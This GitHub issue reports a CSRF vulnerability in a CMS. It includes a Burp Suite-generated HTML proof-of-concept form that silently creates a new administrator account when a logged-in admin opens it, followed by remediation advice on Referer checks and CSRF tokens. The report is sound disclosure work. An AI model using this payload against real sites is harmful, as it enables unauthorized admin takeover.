Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

BUG: CSRF vulnerability #1

Open
fakerrr opened this Issue Jan 9, 2019 · 0 comments

Comments

Projects
None yet
1 participant
@fakerrr
Copy link

fakerrr commented Jan 9, 2019

There is an CSRF vulnerability in your CMS

Log in as an admin Inducing the admin to click on the link success add an administrator.

POC

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.20.28/index.php/admin/user_new" method="POST">
      <input type="hidden" name="username" value="adminer" />
      <input type="hidden" name="password" value="adminer" />
      <input type="hidden" name="password&#95;confirm" value="adminer" />
      <input type="hidden" name="email" value="111&#64;qq&#46;com" />
      <input type="hidden" name="is&#95;admin" value="admin" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

default

default

FIX :

  1. Verify the HTTP Referer field.
  2. Add a token to the request address and verify (the token is not placed in the cookie, placed in the http request parameter, and the server verifies it).
    3 Add the token to the http header attribute to prevent the token from appearing in the browser and being leaked.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.